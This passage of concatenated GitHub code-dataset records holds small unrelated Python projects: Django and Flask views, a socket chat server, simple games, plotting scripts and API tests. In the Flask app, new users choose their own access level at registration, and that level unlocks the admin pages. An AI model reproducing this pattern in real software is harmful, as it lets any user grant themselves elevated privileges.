filey.writelines(\"#!/bin/bash\\n\")\n    filey.writelines(\"#SBATCH --job-name=%s\\n\" %(jobname))\n    filey.writelines(\"#SBATCH --output=.out/%s.out\\n\" %(jobname))\n    filey.writelines(\"#SBATCH --error=.out/%s.err\\n\" %(jobname))\n    filey.writelines(\"#SBATCH --time=2-00:00\\n\")\n    filey.writelines(\"#SBATCH --mem=12000\\n\")\n    # Usage : download_pubmed_muhaha.py start end download_folder\n    filey.writelines(\"/home/vsochat/python-lapack-blas/bin/python /home/vsochat/SCRIPT/python/brainbehavior/download_pubmed_muhaha.py %s %s %s %s\\n\" % (start,end,download_folder,email))\n    filey.close()\n    os.system(\"sbatch -p dpwall .job/%s.job\" % (jobname))\n","repo_name":"vsoch/DisorderBehavior","sub_path":"rdoc/3.run_download_pubmed_muhaha.py","file_name":"3.run_download_pubmed_muhaha.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"37980097754","text":"import json\nimport pygal\nfrom country_codes import get_country_code\nfrom pygal.style import LightColorizedStyle as LCS, RotateStyle as RS\nimport os\n\n\n# load the data into a list\nfilename = 'data/population_data.json'\n\nwith open(filename) as f:\n    pop_data = json.load(f)\n\n# build a dictionary of population data\ncc_populations = {}\n\nfor pop_dict in pop_data:\n    if pop_dict['Year'] =='2010':\n        country = pop_dict['Country Name']\n        population = int(float(pop_dict['Value']))\n        code = get_country_code(country)\n        if code:\n            cc_populations[code] = population\n\n# group the countries into three population levels\ncc_pops_1, cc_pops_2, cc_pops_3 = {},{},{}\nfor cc, pop in cc_populations.items():\n    if pop <10000000:\n        cc_pops_1[cc] = pop\n    elif pop < 1000000000:\n        cc_pops_2[cc] = pop\n    else:\n        cc_pops_3[cc] = pop\n\n# see how many countries are in each level\nprint(len(cc_pops_1), len(cc_pops_2), len(cc_pops_3))\n\nwm_style = RS('#66ff33', base_style = LCS)\nwm = pygal.maps.world.World(style = wm_style)\nwm.title = 'World Population in 2010, by Country'\nwm.add('0-10m', cc_pops_1)\nwm.add('10m-1bn', cc_pops_2)\nwm.add('>1bn', cc_pops_3)\nfile = 'world_population.svg'\nwm.render_to_file(file)\n\ncommand = 'brave ' + file\nos.system(command)","repo_name":"marcelofontes/Visualizacao","sub_path":"world_population.py","file_name":"world_population.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10757254886","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm\n\n\n# Register View and Register Process\ndef register(request):\n    if request.method == \"POST\":\n        form = UserRegisterForm(request.POST)\n        if form.is_valid():\n            form.save()\n            username = form.cleaned_data.get('username')\n            messages.success(request, f'Your Account has been created. 
Now you can log in to your account !')\n            return redirect('login')\n        else:\n            messages.error(request, f'{form.errors}')\n    else:\n        form = UserRegisterForm()\n    return render(request, 'users/register.html', {'form': form})\n\n\n# This view is only accessible if the user is logged in\n@login_required()\ndef profile(request):\n    # check for post\n    if request.method == 'POST':\n        u_form = UserUpdateForm(request.POST, instance=request.user)\n        p_form = ProfileUpdateForm(request.POST, request.FILES,\n                                   instance=request.user.profile)\n        # instance is used to populate form with existing data of model\n        # request.FILES for image fields\n        if u_form.is_valid() and p_form.is_valid():\n            u_form.save()\n            p_form.save()\n            messages.success(request, f'Your Profile has been updated successfully !')\n            return redirect('profile')\n    else:\n        u_form = UserUpdateForm(instance=request.user)\n        p_form = ProfileUpdateForm(instance=request.user.profile)\n\n    context = {\n        'u_form': u_form,\n        'p_form': p_form,\n    }\n    return render(request, 'users/profile.html', context)\n","repo_name":"vaibhav0103/DjangoBlog","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8383222106","text":"from PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtCore import *\r\nimport sys\r\n\r\n\r\nclass Example(QWidget):\r\n    def __init__(self):\r\n        super().__init__()\r\n        self.initUI()\r\n\r\n    def initUI(self):\r\n        self.img = QImage(\"a.jpg\")\r\n        self.refImage = QImage(\"b.jpg\")\r\n        if self.img.isNull():\r\n            print(\"image not found\")\r\n            sys.exit(1)\r\n        self.iw = self.img.width()\r\n        self.ih = self.img.height()\r\n\r\n        self.setGeometry(200,200,500,500)\r\n        self.setWindowTitle('Reflection')\r\n        self.show()\r\n\r\n    # def createReflectedImage(self):\r\n\r\n    # self.refImage = QImage(\"b.jpg\")\r\n    # self.refImage = QImage(self.iw, self.ih, QImage.Format_ARGB32) # to set composition mode on an image of the original size\r\n    # # self.refImage = QImage('b.jpg') # set composition mode on the original image\r\n    # painter = QPainter()\r\n    # painter.begin(self.refImage)\r\n    # painter.drawImage(0, 0, self.img) # copy the original image\r\n    # painter.setCompositionMode(QPainter.CompositionMode_DestinationIn) # opacity of the original image\r\n    #\r\n    # gradient = QLinearGradient(self.iw / 2, 0, self.iw / 2, self.ih) # linear gradient\r\n    # gradient.setColorAt(1, QColor(0, 0, 0)) # black at the start point\r\n    # gradient.setColorAt(0, Qt.transparent) # transparent at the end point\r\n    # painter.fillRect(0, 0, self.iw, self.ih, gradient) # the original image and the gradient overlap\r\n    # painter.end()\r\n\r\n    def paintEvent(self, event):\r\n        painter = QPainter()\r\n        painter.begin(self)\r\n        self.draw(painter)\r\n        painter.end()\r\n\r\n    def draw(self,painter):\r\n        painter.drawImage(25,15,self.img) # draw the image at position 25, 15\r\n        painter.translate(0, 2*self.ih + 15) # shift the origin down by twice the image height plus padding\r\n        painter.scale(1,-1) # flip the vertical axis (mirror downwards)\r\n        painter.drawImage(125,-50,self.refImage) # painter.drawImage(25,0,self.img)\r\n\r\napp = QApplication([])\r\nex = Example()\r\nsys.exit(app.exec_())\r\n","repo_name":"hacks0921/PyQT","sub_path":"15.이미지 반사시키기.py","file_name":"15.이미지 반사시키기.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4232743187","text":"# Bookstores offer the following collections of books.\ns = '''Магистр - Лермонтов, Достоевский, Пушкин, Тютчев.\nДомКниги - Толстой, Грибоедов, Чехов, Пушкин.\nБукМаркет - Пушкин, Достоевский, Маяковский.\nГалерея - Чехов, Тютчев, Пушкин. 
'''\n# Determine which stores sell books by Mayakovsky.\nword = 'Маяковский'\n\nd = {}\nfor i in s.split('\\n'): # loop over the input lines\n    lst = i.replace('.', '').replace(',', '').replace(' -', '').split() # strip dots, commas and dashes from the line\n    d[lst[0]] = set(lst[1:]) # fill the dictionary with the data\n\nfor i in d: # iterate over the dictionary keys\n    if word in d[i]: # check whether the word is in the set\n        print(i)\n","repo_name":"Druzinin/Proj_1sem_Druzhinin","sub_path":"PZ_10/PZ_10_1.py","file_name":"PZ_10_1.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73569320165","text":"from copy import *\n\nboard = {\n    'tl': ' ', 'tm': ' ', 'tr': ' ',\n    'ml': ' ', 'mm': ' ', 'mr': ' ',\n    'bl': ' ', 'bm': ' ', 'br': ' ',\n}\n\nplayer = 'X'\n\ndef print_board(board):\n    print(f\"{board['tl']}|{board['tm']}|{board['tr']}\")\n    print('-+-+-')\n    print(f\"{board['ml']}|{board['mm']}|{board['mr']}\")\n    print('-+-+-')\n    print(f\"{board['bl']}|{board['bm']}|{board['br']}\")\n\ndef run_turn(player, board):\n    new_board = copy(board)\n    while True:\n        turn = input(f'Player {player}, where do you want to play? ')\n        pos = board[turn]\n        if pos == ' ':\n            new_board[turn] = player\n            break\n        else:\n            print('That space is not empty.')\n    return ('X' if player == 'O' else 'O', new_board)\n\nprint_board(board)\nfor i in range(9):\n    player, board = run_turn(player, board)\n    print_board(board)\n\n","repo_name":"dave-burke/python-sample","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73805577124","text":"import pytz\nfrom datetime import datetime, timedelta, timezone\nfrom DB_Schema.DB_Connect import session, exc, text\n\n\n# Piece-wise constant interpolation method (take previous poll status)\n\n# a ,b ,c ,d (polls)\n# + ,- ,+ ,+ (active +, inactive -)\n\n# a -> b +\n# b -> c -\n# c -> d +\n\ndef getUpDownTime(start, end, polls):\n    \n    status = [None]\n    times = [start]\n    \n    filtered_listOfDicts = []\n    for poll in polls:\n        parsedTime = parse(poll['p2'])\n        if parsedTime>=start and parsedTime<=end:\n            filtered_listOfDicts.append((poll['p1'],parsedTime))\n    \n    for poll in filtered_listOfDicts:\n        status.append(poll[0])\n        times.append(poll[1])\n    \n    status.append(None)\n    times.append(end)\n    \n    # Interpolation\n    uptime = 0\n    downtime = 0\n    for i in range(1,len(status)):\n        diffInMins=timeDiffMinutes(times[i-1],times[i])\n        if status[i-1]=='active':\n            uptime+=diffInMins\n        elif status[i-1]=='inactive':\n            downtime+=diffInMins\n        elif status[i-1]==None:\n            pass\n    \n    return uptime, downtime\n\n# Takes two times and returns difference in minutes\ndef timeDiffMinutes(time1_obj, time2_obj):\n    diff = time2_obj - time1_obj\n    diff_minutes = diff.total_seconds() / 60.0\n    return diff_minutes\n\n# Handles different datetime formats\ndef parse(time_str):\n    res = time_str.split('.')\n    if len(res)==2:\n        lres=len(res[1])\n        if lres<6:\n            for i in range(6-lres):\n                res[1]+='0'\n        time_str=res[0]+'.'+res[1]\n    \n    datetime_obj = datetime.fromisoformat(time_str.replace('Z', '+00:00'))\n    return datetime_obj\n\n# Get all data at once - storeid, timezone, polls-aggregate-object [Grouped by storeid]\ndef getPollsWeek(db):\n    try:\n        query = text(\"SELECT t.store_id, \\\n                    coalesce(store_timezone.timezone_str,'America/Chicago'), \\\n                    jsonb_build_object( \\\n                        '2023-01-19', jsonb_agg( \\\n                        
json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-19'), \\\n '2023-01-20', jsonb_agg( \\\n json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-20'), \\\n '2023-01-21', jsonb_agg( \\\n json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-21'), \\\n '2023-01-22', jsonb_agg( \\\n json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-22'), \\\n '2023-01-23', jsonb_agg( \\\n json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-23'), \\\n '2023-01-24', jsonb_agg( \\\n json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-24'), \\\n '2023-01-25', jsonb_agg( \\\n json_build_object('p1', p1, 'p2', p2) ORDER BY p2 \\\n ) FILTER (WHERE DATE(p2) = '2023-01-25') \\\n ) as status_timestamps \\\n FROM ( \\\n SELECT ss.store_id, \\\n status AS p1, \\\n timestamp_utc AS p2 \\\n FROM store_status ss \\\n WHERE timestamp_utc >= '2023-01-18 00:00:00' AND timestamp_utc <= '2023-01-25 23:59:59' \\\n WINDOW w AS (PARTITION BY ss.store_id) \\\n ) AS t \\\n JOIN store_timezone ON t.store_id = store_timezone.store_id \\\n GROUP BY t.store_id, store_timezone.timezone_str \\\n ORDER BY t.store_id\")\n \n response = db.execute(query).fetchall() \n db.commit()\n\n return response\n except exc.SQLAlchemyError as e:\n return e\n \n# Get all data at once - storeid, aggregate-Menu_hours-object\ndef getIntervalsWeekNew(db):\n try:\n query = text(\"SELECT store_id, \\\n json_object_agg(CAST(dayofweek AS text), agg_array ORDER BY dayofweek) AS agg_object \\\n FROM ( \\\n SELECT store_id, dayofweek, ARRAY_AGG(ARRAY[start_time_local, end_time_local] ORDER BY start_time_local) AS agg_array \\\n FROM menu_hours \\\n GROUP BY store_id, dayofweek \\\n ) subquery \\\n GROUP BY store_id \\\n ORDER BY store_id\")\n \n response = db.execute(query).fetchall() \n db.commit()\n\n return response\n except exc.SQLAlchemyError as e:\n return e\n\n# Merge overlapping intervals\ndef listOflistsMergeIntervals(intervals):\n # Convert time strings to datetime objects for easier comparison\n for interval in intervals:\n if type(interval[0]) == str:\n interval[0] = datetime.strptime(interval[0], \"%H:%M:%S\")\n if type(interval[1]) == str:\n interval[1] = datetime.strptime(interval[1], \"%H:%M:%S\")\n\n # Sort the intervals by the start time [Already sorted from database]\n # intervals.sort(key=lambda interval: interval[0])\n merged_intervals = []\n for interval in intervals:\n if not merged_intervals or merged_intervals[-1][1] < interval[0]:\n # If the current interval doesn't overlap with the previous one, add it to the list\n merged_intervals.append(interval)\n else:\n # If the current interval overlaps with the previous one, merge them\n merged_intervals[-1][1] = max(merged_intervals[-1][1], interval[1])\n\n # Convert datetime objects back to time strings\n for interval in merged_intervals:\n interval[0] = interval[0].strftime(\"%H:%M:%S\")\n interval[1] = interval[1].strftime(\"%H:%M:%S\")\n\n return merged_intervals\n\n# Type casting utilities\ndef convertToLocal_withFloat(time_string, zone):\n return datetime.strptime(time_string, '%Y-%m-%d %H:%M:%S.%f').replace(tzinfo=pytz.utc).astimezone(pytz.timezone(zone)).strftime('%Y-%m-%d %H:%M:%S')\n\ndef convertToLocal(time_string, zone):\n return datetime.strptime(time_string, '%Y-%m-%d %H:%M:%S').replace(tzinfo=pytz.utc).astimezone(pytz.timezone(zone)).strftime('%Y-%m-%d 
%H:%M:%S')\n\ndef convertToLocal_T(time_string, zone):\n meta = time_string.split('.')\n if len(meta)<=1:\n return datetime.strptime(time_string, '%Y-%m-%dT%H:%M:%S').replace(tzinfo=pytz.utc).astimezone(pytz.timezone(zone)).strftime('%Y-%m-%d %H:%M:%S')\n return datetime.strptime(time_string, '%Y-%m-%dT%H:%M:%S.%f').replace(tzinfo=pytz.utc).astimezone(pytz.timezone(zone)).strftime('%Y-%m-%d %H:%M:%S')\n","repo_name":"tanmaybisen/loop-assignment-01","sub_path":"routes/helperFunctions.py","file_name":"helperFunctions.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18898362344","text":"from flask import render_template, flash, redirect, url_for, request, session\nfrom app import app\nfrom app.forms import LoginForm\n\n\nfrom flask_login import current_user, login_user, logout_user, login_required\nfrom app.models import User\n\nfrom app import db\nfrom app.forms import RegistrationForm\n\nimport pygal\nfrom pygal.style import Style\n\nfrom werkzeug.urls import url_parse\n\n\n\nimport mongo_queries\n\n\nimport pandas as pd\n\nimport plotly\nimport plotly.express as px\nimport json\n\n\n\n\n@app.route('/')\n\n\n@app.route('/index')\n@login_required\ndef index():\n\n queries = [\n {\n \"number\" : 1,\n \"body\": \"All members who took a loan in XX, according to category Y.\",\n \"access_type\":0\n },\n {\n \"number\" : 2,\n \"body\": \"List of payments made by employees of company XX and whose credit provider resides in Savannah.\",\n \"access_type\":0\n },\n {\n \"number\" : 3,\n \"body\": \"List of members who have contracted a category XX loan and who live in a street with the word YY in it.\",\n \"access_type\":0\n },\n {\n \"number\" : 4,\n \"body\": \"Member with a capital greater than XX $, having taken a loan from a provider YY, and whose telephone number and the one of the provider end with the same numbers.\",\n \"access_type\":0\n },\n {\n \"number\" : 5,\n \"body\": \"Corporation whose employees are indebted and must repay their loans as quickly as possible.\",\n \"access_type\":1\n },\n {\n \"number\" : 6,\n \"body\": \"By category, name of the provider that provides the most liquidity.\",\n \"access_type\":1\n },\n {\n \"number\" : 7,\n \"body\": \"Average time required for a member to repay a loan (already paid) by range of credit contracted. 
TAKES TIME TO COMPUTE\",\n            \"access_type\":1\n        },\n        {\n            \"number\" : 8,\n            \"body\": \"Average interest rate of each provider, by category.\",\n            \"access_type\":1\n        },\n    ]\n\n    return render_template('index.html', title='Home Page', queries=queries)\n\n\n@app.route('/register', methods=['GET', 'POST'])\ndef register():\n    if current_user.is_authenticated:\n        return redirect(url_for('index'))\n    form = RegistrationForm()\n    if form.validate_on_submit():\n        user = User(username=form.username.data, email=form.email.data, access_type=form.access_type.data)\n        user.set_password(form.password.data)\n        db.session.add(user)\n        db.session.commit()\n        flash('Congratulations, you are now a registered user!')\n        return redirect(url_for('login'))\n    return render_template('register.html', title='Register', form=form)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n    if current_user.is_authenticated:\n        return redirect(url_for('index'))\n    form = LoginForm()\n    if form.validate_on_submit():\n        user = User.query.filter_by(username=form.username.data).first()\n        if user is None or not user.check_password(form.password.data):\n            flash('Invalid username or password')\n            return redirect(url_for('login'))\n        login_user(user, remember=form.remember_me.data)\n        next_page = request.args.get('next')\n        if not next_page or url_parse(next_page).netloc != '':\n            next_page = url_for('index')\n        return redirect(next_page)\n    return render_template('login.html', title='Sign In', form=form)\n\n\n@app.route('/logout')\ndef logout():\n    logout_user()\n    return redirect(url_for('index'))\n\n\n@app.route('/q1', methods =[\"GET\", \"POST\"])\ndef q1():\n\n    if request.method == \"POST\":\n       \n        category = request.form.get(\"category\")\n        year = request.form.get(\"year\")\n\n        res = mongo_queries.query_1(category, year)\n        \n        return render_template('q1.html', title='Query 1', res=res)\n       \n    return render_template(\"q1.html\")\n\n\n@app.route('/q2', methods =[\"GET\", \"POST\"])\ndef q2():\n\n    if request.method == \"POST\":\n       \n        corp_name = request.form.get(\"corp\")\n        #city = request.form.get(\"city\")\n\n        res = mongo_queries.query_2(corp_name)\n        \n        return render_template('q2.html', title='Query 2', res=res)\n       \n    return render_template(\"q2.html\")\n\n\n@app.route('/q3', methods =[\"GET\", \"POST\"])\ndef q3():\n\n    if request.method == \"POST\":\n       \n        category = request.form.get(\"category\")\n        street = request.form.get(\"street\")\n\n        res = mongo_queries.query_3(category, street)\n        \n        return render_template('q3.html', title='Query 3', res=res)\n       \n    return render_template(\"q3.html\")\n\n\n@app.route('/q4', methods =[\"GET\", \"POST\"])\ndef q4():\n\n    if request.method == \"POST\":\n       \n        capital = request.form.get(\"capital\")\n        provider = request.form.get(\"provider\")\n\n        res = mongo_queries.query_4(capital, provider)\n        \n        return render_template('q4.html', title='Query 4', res=res)\n       \n    return render_template(\"q4.html\")\n\n\n@app.route('/q5')\ndef q5():\n\n    if current_user.access_type>=1:\n        \n        res = mongo_queries.query_5()   \n        return render_template('q5.html', title='Query 5', res=res)\n\n    else:\n        return render_template('denied.html')\n\n@app.route('/q6') \ndef q6():\n\n    if current_user.access_type>=1:\n\n        res = mongo_queries.query_6()\n\n        # Collect all the information to plot\n\n        data = pd.json_normalize(res)\n\n        fig = px.bar(data, x='_id', y='maxi.amount', color='maxi.provider_name', barmode='group', title = 'By category, name of the provider that provides the most liquidity.',\n                 \n                 labels={\n                        \"_id\": \"Credit category\",\n                        
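# labels maps raw DataFrame column names to human-readable axis/legend names\n                        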
\"maxi.provider_name\": \"Provider name\",\n \"maxi.amount\": \"Amount provided\"\n }\n \n )\n\n graphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\n\n return render_template('q6.html', graphJSON = graphJSON, res=res)\n\n else:\n return render_template('denied.html')\n\n\n@app.route('/q7') \ndef q7():\n\n if current_user.access_type>=1:\n\n res = mongo_queries.query_7()\n\n for elem in res:\n elem['average_repayment_time'] = abs(elem['average_repayment_time'])\n\n #Collect all the informations to plot\n\n data = pd.json_normalize(res)\n fig = px.bar(data, x='_id', y='average_repayment_time', barmode='group', title = 'Average time required for a member to repay a loan (already paid) by range of credit contracted.',\n \n labels={\n \"_id\": \"Credit range in $\",\n \"average_repayment_time\": \"Average time in days\"\n }\n \n )\n\n graphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\n return render_template('q7.html', title='Query 7', res=res, graphJSON = graphJSON)\n\n else:\n return render_template('denied.html')\n\n\n@app.route('/q8') \ndef q8():\n\n if current_user.access_type>=1:\n\n res = mongo_queries.query_8()\n #Collect all the informations to plot\n\n data = pd.json_normalize(res)\n fig = px.bar(data, x='category', y='monthly_rate', color='provider_no', title = 'Average interest rate of each provider, by category.',\n \n labels={\n \"category\": \"Credit loan category\",\n \"monthly_rate\": \"Monthly rate (%)\"\n }\n \n )\n\n graphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n\n return render_template('q8.html', title='Query 8', res=res, graphJSON = graphJSON)\n\n else:\n return render_template('denied.html')\n\n\n@app.route('/admin') \ndef admin():\n\n if current_user.access_type>=2:\n\n collections = mongo_queries.get_list_collections()\n number_objects = mongo_queries.get_number_objects()\n avg_object_size = mongo_queries.get_avg_object_size()\n data_size = mongo_queries.get_data_size()\n indexes = mongo_queries.get_indexes()\n storage_size = mongo_queries.get_storage_size()\n num_collections = mongo_queries.get_number_collection()\n\n\n return render_template('admin.html', collections=collections, number_objects=number_objects,\n avg_object_size=avg_object_size, data_size = data_size, indexes = indexes,\n storage_size = storage_size, num_collections=num_collections)\n\n else:\n return render_template('denied.html')","repo_name":"Infrastructure-donnees-cloud/ESILV-A5-Infrastructure-de-donnees-cloud","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":8550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"45840046406","text":"from flask_nav.elements import *\nfrom app.helpers import current_user\n\n\ndef user_nav_item():\n\tuser = current_user()\n\tif not user:\n\t\treturn View('Login', 'login')\n\telse:\n\t\treturn Subgroup(user.full_name,\n\t\t\tView('View profile', 'users.view_single', user_id=user.id),\n\t\t\tSeparator(),\n\t\t\tView('Logout', 'logout'))\n\ndef navbar():\n\treturn Navbar(\n\t\tView('Genera', 'index'),\n\t\tView('Home', 'index'),\n\t\tView('Users', 'users.view_all'),\n\t\tView('Events', 'events.view_all'),\n\t\tuser_nav_item())\n","repo_name":"peterctl/Genera-Flask","sub_path":"app/navigation.py","file_name":"navigation.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19691745395","text":"import socket, select, 
threading, time\r\n\r\n# start_server opens a socket on the ip \"host\" and port \"port\"\r\n# nb_waitlist is the maximum backlog of clients waiting to connect\r\n# the function returns the server socket\r\ndef start_server(host,port,nb_waitlist):\r\n    \r\n    connexion_main = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n    connexion_main.bind((host, port))\r\n    connexion_main.listen(nb_waitlist)\r\n    print(\"server listening on host: \", host, \", port :\", port)\r\n\r\n    return connexion_main\r\n\r\n# accept_new_client accepts a new connection\r\n# the function returns the new socket\r\ndef accept_new_client(connexion_main):\r\n    connexion_with_client, client_infos = connexion_main.accept()\r\n    print(client_infos)\r\n    # return the accepted client's socket\r\n    return connexion_with_client\r\n    \r\n# reads a message from a \"client\" socket and returns it decoded.\r\ndef read_message_from_client(client):\r\n    BUFF_SIZE = 4096 # 4 KiB\r\n    data = b''\r\n    while True:\r\n        part = client.recv(BUFF_SIZE)\r\n        data += part\r\n        if len(part) < BUFF_SIZE:\r\n            # either 0 or end of data\r\n            break\r\n    return data.decode()\r\n\r\ndef broadcast_message(message, sockets, socket, connexion_main):\r\n    for c in sockets:\r\n        if c != socket and c != connexion_main:\r\n            msg_send=message.encode()\r\n            c.send(msg_send)\r\n    \r\ndef close_sockets(sockets, connexion_main):\r\n    # Close the client connections, hence their sockets\r\n    for client in sockets:\r\n        if client is not connexion_main:\r\n            client.close()\r\n    connexion_main.close() ## close the main socket\r\n\r\ndef main():\r\n    host = \"127.0.0.1\"\r\n    port = 12807\r\n\r\n    connexion_main = start_server(host, port, 5)\r\n\r\n    server_up= True\r\n    sockets = [connexion_main]\r\n\r\n    while server_up: ## while True:\r\n        \r\n        # Listen on the list of sockets\r\n        # The clients returned by select are the ones that must be read (recv)\r\n        # Poll until there is a connection or a message (timeout 0)\r\n        # Wrap the select.select call in a try block\r\n        \r\n        ### Alternative scenario \r\n\r\n        try:\r\n            sockets_to_read, writable, errors = select.select(sockets,[], sockets, 0)\r\n        except select.error:\r\n            pass\r\n\r\n        # continue in sequence if there were no errors\r\n        else: \r\n            for client_error in errors:\r\n                sockets.remove(client_error)\r\n                client_error.close()\r\n                print(\"Client disconnected due to an error\")\r\n            # Iterate over the list of clients to read\r\n            for socket in sockets_to_read:\r\n                # If the socket is the server socket, it is a new connection.\r\n                if socket is connexion_main:\r\n                    new_client = accept_new_client(socket)\r\n                    # add it to the sockets being listened to.\r\n                    sockets.append(new_client)\r\n\r\n                # Otherwise it is a client\r\n                else:\r\n                    # Read the message written by the client.\r\n                    try:\r\n                        message = read_message_from_client(socket)\r\n                    except ConnectionError:\r\n                        socket.close()\r\n                        sockets.remove(socket)\r\n                        print(\"Client disconnected\")\r\n                    else:\r\n                        if not message:\r\n                            socket.close()\r\n                            sockets.remove(socket)\r\n                            print(\"Client disconnected\")\r\n                        else:\r\n                            print(\"received msg :\", message)\r\n                            broadcast_message(message, sockets, socket, connexion_main)\r\n                            if message.upper().endswith(\":FIN\"):\r\n                                server_up = False\r\n                                print(\"Connections closed by one of the clients \")\r\n                                close_sockets(sockets, connexion_main)\r\n
\r\n\r\nmain()\r\n","repo_name":"Syugeek/TP-Python","sub_path":"Serveur.py","file_name":"Serveur.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16743666875","text":"import random \n\ndef ranact():\n\tact = random.choice(action)\n\treturn act\n\t\ndef inp():\n\tguss = input('Enter Your choice : (sang , kaghaz, gheichi) (\"s\" for score \"0\" for end)')\n\treturn guss\n\t\naction=['sang','kaghaz','gheichi']\ncscore=0\nscore=0\nx=1\nwhile x==1:\n\tcomputer = ranact()\n\tplayer = inp()\n\tif player==computer:\n\t\tprint('equal,computer choice was',computer)\n\telif player not in action:\n\t\t\tif player=='0':\n\t\t\t\tif int(score)>int(cscore) :\n\t\t\t\t\tprint('you win\\n scores:\\n your score : {}\\n computer score : {}'.format(score,cscore))\n\t\t\t\t\tbreak\n\t\t\t\telif int(score)= 0\n\ndef test_check_level():\n hero_xp = 400\n level = check_level(hero_xp)\n assert isinstance(level, int)\n assert level == 5\n\ndef test_final_boss_battle():\n hero_name = \"Izuku Midoriya\"\n hero_level = 10\n final_boss_result = final_boss_battle(hero_name, hero_level)\n assert isinstance(final_boss_result, bool)\n","repo_name":"OrangeJuice023/CS50P_2022","sub_path":"Final Project/test_project.py","file_name":"test_project.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72018605285","text":"from rest_framework.test import APIClient\nfrom testing.testcases import TestCase\nfrom comments.models import Comment\nfrom django.utils import timezone\n\nCOMMENT_URL = '/api/comments/'\nCOMMENT_DETAIL_URL = '/api/comments/{}/'\n\n\nclass CommentApiTests(TestCase):\n\n def setUp(self):\n self.user1 = self.create_user('user1')\n self.user1_client = APIClient()\n self.user1_client.force_authenticate(self.user1)\n\n self.user2 = self.create_user('user2')\n self.user2_client = APIClient()\n self.user2_client.force_authenticate(self.user2)\n\n self.tweet = self.create_tweet(self.user1)\n\n def test_create(self):\n response = self.anonymous_client.post(COMMENT_URL)\n self.assertEqual(response.status_code, 403)\n\n response = self.user1_client.post(COMMENT_URL)\n self.assertEqual(response.status_code, 400)\n\n response = self.user1_client.post(\n COMMENT_URL, {'tweet_id': self.tweet.id})\n self.assertEqual(response.status_code, 400)\n\n response = self.user1_client.post(COMMENT_URL, {'content': '1'})\n self.assertEqual(response.status_code, 400)\n\n # content too long\n response = self.user1_client.post(COMMENT_URL, {'tweet_id': self.tweet.id,\n 'content': '1' * 142, })\n self.assertEqual(response.status_code, 400)\n self.assertEqual('content' in response.data['errors'], True)\n\n response = self.user1_client.post(COMMENT_URL, {\n 'tweet_id': self.tweet.id,\n 'content': '1',\n })\n self.assertEqual(response.status_code, 201)\n self.assertEqual(response.data['user']['id'], self.user1.id)\n self.assertEqual(response.data['tweet_id'], self.tweet.id)\n self.assertEqual(response.data['content'], '1')\n\n def test_update(self):\n comment = self.create_comment(self.user1, self.tweet, 'original')\n another_tweet = self.create_tweet(self.user2)\n url = COMMENT_DETAIL_URL.format(comment.id)\n\n response = self.anonymous_client.put(url, {'content': 'new'})\n self.assertEqual(response.status_code, 403)\n\n response = self.user2_client.put(url, {'content': 'new'})\n self.assertEqual(response.status_code, 403)\n #\n 
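# a rejected update must leave the stored comment unchanged\n        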
